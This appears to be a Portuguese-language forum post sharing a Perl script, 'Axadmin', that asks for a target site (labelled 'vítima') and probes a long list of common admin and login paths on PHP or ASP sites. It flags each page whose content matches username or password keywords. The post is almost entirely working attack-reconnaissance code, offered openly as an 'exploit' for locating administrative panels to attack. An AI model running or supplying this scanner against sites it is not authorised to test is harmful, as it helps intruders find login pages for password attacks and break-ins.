Exploit para achar áreas administrativas de sites PHP/ASP
Code Select
#!/usr/bin/perl
##
# By_KuNdUz
# Admin Control Panel Finder ___ Last Version 1.1 ( correcting )
##
use HTTP::Request;
use LWP::UserAgent;
system('cls');
system('title Axadmin ');
print"\n";
print
"\t###########################################################\n";
print "\t# Axadmin v.Brasil
#\n";
print "\t# Criado por:KuNdUz
#\n";
print
"\t###########################################################\n";
print "\n";
print "* ENTRE COM A URL DO SITE\n* EX : [url=http://WWW.VITIMA.COM.BR]WWW.VITIMA.COM.BR[/url] OU
[url=http://WWW.VITIMA.COM.BR/CAMINHO\n===]WWW.VITIMA.COM.BR/CAMINHO\n===[/url]> ";
$site=<STDIN>;
chomp $site;
print "\n";
print "* ENTRE COM A PROGRAMACAO DO SITE\n* EX : ASP OU PHP\n===> ";
$code=<STDIN>;
chomp($code);
if ( $site !~ /^http:/ ) {
$site = 'http://' . $site;
}
if ( $site !~ /\/$/ ) {
$site = $site . '/';
}
print "\n";
print "==> Vitima: $site\n";
print "==> Linguagem do site: $code\n";
print "==> Procurando Area Administrativa do Site\n\n\n";
if($code eq "asp"){
@path1=('painel/','admin/','administrator/','moderator/','webadmin/','a
dminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracio
n/','instadmin/',
'memberadmin/','administratorlogin/','adm/','account.asp','admin/accoun
t.asp','admin/index.asp','admin/login.asp','admin/admin.asp',
'admin_area/admin.asp','admin_area/login.asp','admin/account.html','adm
in/index.html','admin/login.html','admin/admin.html',
'admin_area/admin.html','admin_area/login.html','admin_area/index.html'
,'admin_area/index.asp','bb-admin/index.asp','bb-admin/login.asp','bb-a
dmin/admin.asp',
'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admi
n/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp
.html',
'administrator/index.html','administrator/login.html','administrator/ac
count.html','administrator.html','login.html','modelsearch/login.html',
'moderator.html',
'moderator/login.html','moderator/admin.html','account.html','controlpa
nel.html','admincontrol.html','admin_login.html','panel-administracion/
login.html',
'admin/home.asp','admin/controlpanel.asp','admin.asp','pages/admin/admi
n-login.asp','admin/admin-login.asp','admin-login.asp','admin/cp.asp','
cp.asp',
'administrator/account.asp','administrator.asp','login.asp','modelsearc
h/login.asp','moderator.asp','moderator/login.asp','administrator/login
.asp',
'moderator/admin.asp','controlpanel.asp','admin/account.html','adminpan
el.html','webadmin.html','pages/admin/admin-login.html','admin/admin-lo
gin.html',
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user
.asp','user.html','admincp/index.asp','admincp/login.asp','admincp/inde
x.html',
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home
.html','adminarea/index.html','adminarea/admin.html','adminarea/login.h
tml',
'panel-administracion/index.html','panel-administracion/admin.html','mo
delsearch/index.html','modelsearch/admin.html','admin/admin_login.html'
,
'admincontrol/login.html','adm/index.html','adm.html','admincontrol.asp
','admin/account.asp','adminpanel.asp','webadmin.asp','webadmin/index.a
sp',
'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admi
n_login.asp','panel-administracion/login.asp','adminLogin.asp',
'admin/adminLogin.asp','home.asp','admin.asp','adminarea/index.asp','ad
minarea/admin.asp','adminarea/login.asp','admin-login.html',
'panel-administracion/index.asp','panel-administracion/admin.asp','mode
lsearch/index.asp','modelsearch/admin.asp','administrator/index.asp',
'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','adm
in2.asp','admin2/login.asp','admin2/index.asp','adm/index.asp',
'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administrat
orlogin.asp','siteadmin/login.asp','siteadmin/index.asp','siteadmin/log
in.html'
);
foreach $ways(@path1){
$final=$site.$ways;
my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);
if($response->content =~ /Username/ ||
$response->content =~ /Password/ ||
$response->content =~ /username/ ||
$response->content =~ /password/ ||
$response->content =~ /USERNAME/ ||
$response->content =~ /PASSWORD/ ||
$response->content =~ /Senha/ ||
$response->content =~ /senha/ ||
$response->content =~ /Personal/ ||
$response->content =~ /Usuario/ ||
$response->content =~ /Clave/ ||
$response->content =~ /Usager/ ||
$response->content =~ /usager/ ||
$response->content =~ /Sing/ ||
$response->content =~ /passe/ ||
$response->content =~ /P\/W/ ||
$response->content =~ /Admin Password/
){
print " \n [+] Encontrado -> $final\n\n";
}else{
print "[-] Nada encontrado <- $final\n";
}
}
}
if($code eq "php"){
@path2=('painel/','admin/','administrator/','moderator/','webadmin/','a
dminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracio
n/','instadmin/',
'memberadmin/','administratorlogin/','adm/','admin/account.php','admin/
index.php','admin/login.php','admin/admin.php','admin/account.php',
'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','si
teadmin/index.php','siteadmin/login.html','admin/account.html','admin/i
ndex.html','admin/login.html','admin/admin.html',
'admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-ad
min/admin.php','admin/home.php','admin_area/login.html','admin_area/ind
ex.html',
'admin/controlpanel.php','admin.php','admincp/index.asp','admincp/login
.asp','admincp/index.html','admin/account.html','adminpanel.html','weba
dmin.html',
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admi
n/admin_login.html','admin_login.html','panel-administracion/login.html
',
'admin/cp.php','cp.php','administrator/index.php','administrator/login.
php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php'
,'admin_login.php',
'administrator/account.php','administrator.php','admin_area/admin.html'
,'pages/admin/admin-login.php','admin/admin-login.php','admin-login.php
',
'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admi
n/home.html','login.php','modelsearch/login.php','moderator.php','moder
ator/login.php',
'moderator/admin.php','account.php','pages/admin/admin-login.html','adm
in/admin-login.html','admin-login.html','controlpanel.php','admincontro
l.php',
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home
.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admi
n.html',
'webadmin.php','webadmin/index.php','webadmin/admin.php','admin/control
panel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','mo
derator.html',
'administrator/index.html','administrator/login.html','user.html','admi
nistrator/account.html','administrator.html','login.html','modelsearch/
login.html',
'moderator/login.html','adminarea/login.html','panel-administracion/ind
ex.html','panel-administracion/admin.html','modelsearch/index.html','mo
delsearch/admin.html',
'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.
html','user.php','account.html','controlpanel.html','admincontrol.html'
,
'panel-administracion/login.php','wp-login.php','adminLogin.php','admin
/adminLogin.php','home.php','admin.php','adminarea/index.php',
'adminarea/admin.php','adminarea/login.php','panel-administracion/index
.php','panel-administracion/admin.php','modelsearch/index.php',
'modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php'
,'admloginuser.php','admin2.php','admin2/login.php','admin2/index.php',
'adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.p
hp','administratorlogin.php'
);
foreach $ways(@path2){
$final=$site.$ways;
my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);
if($response->content =~ /Username/ ||
$response->content =~ /Password/ ||
$response->content =~ /username/ ||
$response->content =~ /password/ ||
$response->content =~ /USERNAME/ ||
$response->content =~ /PASSWORD/ ||
$response->content =~ /Senha/ ||
$response->content =~ /senha/ ||
$response->content =~ /Personal/ ||
$response->content =~ /Usuario/ ||
$response->content =~ /Clave/ ||
$response->content =~ /Usager/ ||
$response->content =~ /usager/ ||
$response->content =~ /Sing/ ||
$response->content =~ /passe/ ||
$response->content =~ /P\/W/ ||
$response->content =~ /Admin Password/
){
print " \n [+] Encontrado ==> $final\n\n";
}else{
print "[-] Nada Encontrado <== $final\n";
}
}
}
print "\n";
print "\n";
print "\n";
print "\n";
##
# By_KuNdUz
##